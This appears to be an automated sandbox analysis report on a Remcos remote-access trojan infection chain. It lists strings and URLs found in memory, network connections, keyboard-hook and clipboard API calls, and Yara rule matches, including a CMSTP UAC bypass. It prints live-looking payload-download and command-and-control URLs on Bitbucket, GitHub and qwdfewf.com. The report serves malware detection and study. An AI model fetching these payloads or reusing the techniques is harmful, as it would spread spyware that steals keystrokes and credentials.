                      Source: RegAsm.exe, RegAsm.exe, 00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: RegAsm.exe, 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B83AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: PdfReaderEn.EXE, 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmp, PdfReaderEn.EXE, 0000000B.00000000.1470386377.0000000000408000.00000002.00000001.01000000.0000000A.sdmp, PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: powershell.exe, 00000007.00000002.1736154825.000001F6C3992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: bhvE1B8.tmp.37.dr, PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: RegAsm.exe, 00000009.00000002.1537317900.0000000002060000.00000004.00000020.00020000.00000000.sdmp, PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                      Source: powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/
                      Source: RegAsm.exe, 00000009.00000002.1530325114.000000000040B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/dwn_legit_file
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/dwn_legit_file2
                      Source: RegAsm.exe, 00000009.00000002.1530325114.000000000040B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/dwn_payload_file
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/dwn_payload_file/g
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/dwn_payload_fileH
                      Source: RegAsm.exe, 00000009.00000002.1530325114.000000000040B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/dwn_payload_filehttp://qwdfewf.com/dwn_legit_file%
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/dwn_payload_filei
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/dwn_payload_filet
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.1533827567.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/reg_auth_machine
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/reg_auth_machine/
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/reg_auth_machine8
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/reg_auth_machineP
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwdfewf.com/reg_auth_machinen
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B7A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000005.00000002.2276191750.00000256B2350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D823FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B7A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                      Source: powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000000.1581000790.0000000000759000.00000002.00000001.01000000.0000000D.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, InnoCraft.scr, 0000002B.00000000.1740628764.0000000000DB9000.00000002.00000001.01000000.0000000F.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: PdfReaderEn.EXE.9.dr, legit[1].exe.9.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: RegAsm.exe, RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                      Source: RegAsm.exe, RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                      Source: RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                      Source: RegAsm.exe, 00000025.00000002.1698984319.00000000009B3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: powershell.exe, 00000005.00000002.2276191750.00000256B22F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                      Source: powershell.exe, 00000005.00000002.2276191750.00000256B231A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D823FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B7A0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B8E99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B8E99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B3D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                      Source: powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                      Source: powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B78DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D827F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                      Source: powershell.exe, 00000015.00000002.1714325492.000001D827F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/30826a14-694e-
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B78DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/e4679797-5458-
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B78DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D827F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B78DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/fwfsfw/fwf/downloads/FkFjirc.txt
                      Source: powershell.exe, 00000015.00000002.1714325492.000001D827F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/fwfsfw/fwf/downloads/knSfcpm.txt
                      Source: powershell.exe, 00000005.00000002.2475898661.00000256CA9F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2276191750.00000256B2851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B7D99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1452667448.000001F6B1C92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453022165.000001F6B1E95000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1452667448.000001F6B1CFB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453076972.000001F6B3670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1452667448.000001F6B1C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1680360575.000001D822373000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D823FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1703643923.000001D823DE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1680360575.000001D8223EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1680360575.000001D822360000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1673231192.000001D8222E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B3D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                      Source: powershell.exe, 00000007.00000002.1736154825.000001F6C3992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000007.00000002.1736154825.000001F6C3992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000007.00000002.1736154825.000001F6C3992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B3D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                      Source: powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B83AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B8E99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B8214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: RegAsm.exe, 00000025.00000002.1709093600.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.D
                      Source: RegAsm.exe, 00000025.00000002.1709093600.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.li
                      Source: RegAsm.exe, 00000025.00000002.1709093600.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000025.00000002.1706663774.0000000000D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: RegAsm.exe, 00000025.00000002.1709093600.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: RegAsm.exe, 00000025.00000002.1709093600.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: powershell.exe, 00000007.00000002.1736154825.000001F6C3992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                      Source: powershell.exe, 00000005.00000002.2475898661.00000256CA9F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2276191750.00000256B2851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B7D99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1452667448.000001F6B1C92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453022165.000001F6B1E95000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1452667448.000001F6B1CFB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453076972.000001F6B3670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1452667448.000001F6B1C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1680360575.000001D822373000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D823FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1703643923.000001D823DE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1680360575.000001D8223EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1680360575.000001D822360000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1673231192.000001D8222E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B3D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B3D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B3D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1453521451.000001F6B3B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D824209000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D8243DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                      Source: Healthcare.11.drString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: PdfReaderEn.EXE, 0000000B.00000003.1483173388.0000000002A04000.00000004.00000020.00020000.00000000.sdmp, Lucas.pif, 0000001D.00000003.1589061075.00000000038EF000.00000004.00000800.00020000.00000000.sdmp, Lucas.pif.13.dr, InnoCraft.scr.29.dr, Healthcare.11.drString found in binary or memory: https://www.globalsign.com/repository/06
                      Source: RegAsm.exe, RegAsm.exe, 00000028.00000002.1679494904.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.9:49761 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.217.171.225:443 -> 192.168.2.9:49770 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49845 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49871 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.5.10.196:443 -> 192.168.2.9:49879 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000033_2_0040A2F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_004050CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,33_2_004168FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,37_2_0040987A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,37_2_004098E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,38_2_00406DFC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,38_2_00406E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,40_2_004068B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,40_2_004072B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,33_2_0040B749
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,11_2_004044A5
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041CA73 SystemParametersInfoW,33_2_0041CA73

                      System Summary

                      barindex
                      Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
